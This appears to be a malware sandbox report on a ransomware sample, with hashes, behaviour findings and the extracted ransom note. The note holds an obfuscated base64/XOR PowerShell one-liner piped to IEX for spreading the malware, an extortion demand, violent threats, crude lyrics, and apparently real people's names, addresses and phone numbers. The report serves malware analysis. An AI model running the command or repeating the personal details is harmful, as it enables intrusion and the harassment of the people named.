General

  • Target

    2025-05-03_7776eaa9351dfe276804296e2958d031_amadey_black-basta_darkgate_elex_luca-stealer

  • Size

    413KB

  • Sample

    250503-ra1kxatwhw

  • MD5

    7776eaa9351dfe276804296e2958d031

  • SHA1

    d88159683ef324db4eab274089617f750785f049

  • SHA256

    9e994937cc7b67187c3f4c1f0d14afa59c54c664dabaf3e4f988203556a9f385

  • SHA512

    20d5c8968be3c6e30c92f7ea5a9c80957daf2063fa0981c0911539ca0a48438149319944986a9914593ae057d1661e5abe0cb7fcbd5b42b2a2f0565fc3e6ade5

  • SSDEEP

    12288:71FBp1se5BW2bC+Wtgro0T4Mu7gkV1NwsyyX4:7Pb1se5BW2Nro0T4Mu7gkV17yy

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\RANSOMNOTE.txt

Ransom Note
DOGE BIG BALLS RANSOMWARE

To the window 🪟, to the wall 🧱 'Til the sweat 💦 drips down my balls 🥜 All these bitches crawl 🐛 Ahh skeet skeet motherfucker 💦 Ahh skeet skeet goddamn 💦 Shorty crunk, so fresh, so clean ✨ Can she fuck? That question been asked me 🧠 In the mind, this bitch is fine 😍 I done came to the club 'bout fifty-eleven times 🕺 Now can I play with yo' panty line? 🍑 The club owner said I need to calm down 🤫 Security guard go 'round threaten me now 🥊 She gettin' crunk in the club, I mean she workin' it out 🥵 And then I like this girl, she on fire 🔥 She twerkin' that thang on my dick 🍆 I'm like bitch! Stop, drop and roll! 🔥

Hi, my name is Edward Coristine and I live at 29 Lakeview Ave. New Canaan, CT 06840 and my phone number is (914) 834-0137. Give me five bullet points on what you accomplished for work last week or you owe me a TRILLION dollars. Send 4.721373 XMR (Monero) to this wallet address and text your session ID 91dee70a4a291a84fc088333 to us. 8BejUQh2TAA5rUz3375hHM7JT8ND2i4u5hkVXc9Bcdw1PTrCrrDzayWBj6roJsE1EWBPGU4PMKohHWZUMopE8WkY7iA6UC1 P.S. I will decrypt for free if you send the PDF file to someone else and call or text me back.

Tech Support: Gavin Kliger April 1999 1 E Greenbrier Trabuco, CA 92679 (949)766-0654 Akash Bobba July 12th, 2003 26205 Osprey Way West Windsor, NJ 08550 (732) 790-5469 Don't snitch now.

We grabbed your trilatitude and trilongitude (the most accurate) coordinates of where you live. To prove to you we are not lying... https://pastebin.com/STi66Ceu https://pastebin.com/sp65dtUx You either do what we tell you to do, pay it up, or spread it around with this one-liner. Open a administrative powershell console on someone else's computer with Windows+R, type powershell.exe, and Ctrl+Shift+Enter, and copy and paste this line and hit enter. [System.Text.Encoding]::UTF8.GetString(([Convert]::FromBase64String("PCIndXggJzx1cj0wOSUzIDl4JSAzMyUgMzN4NDQ2MGJnezswITk8Myx7NCUleiYhNDIwZHslJmRydXgAJjAXNCY8NgU0JyY8OzJ1KXUcEA0=") | % { $_ -bxor 0x55 })) | IEX Then contact us by sending us back your session ID 91dee70a4a291a84fc088333 so we can decrypt your files for free.

Do you know why we are targeting you? Because you are a... 1. Scammer 2. Grifter 3. Nazi 4. Incel 5. Traitor, including those that bend the knee to others (a quisling) We are going to have the French Revolution Part 2. The guillotines will be very busy over the next decade. Starting with them.
URLs

https://pastebin.com/STi66Ceu

https://pastebin.com/sp65dtUx

https://www.forbes.com/sites/daveywinder/2025/04/23/doge-ransomware-hackers-demand-1-trillion/

https://x.com/_Thomas_Mix_/status/1915157408709828786

http://Adjustment.zip

Targets

    • Target

      2025-05-03_7776eaa9351dfe276804296e2958d031_amadey_black-basta_darkgate_elex_luca-stealer

    • Renames multiple (73) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Checks system information in the registry

      System information is often read in order to detect sandboxing environments.
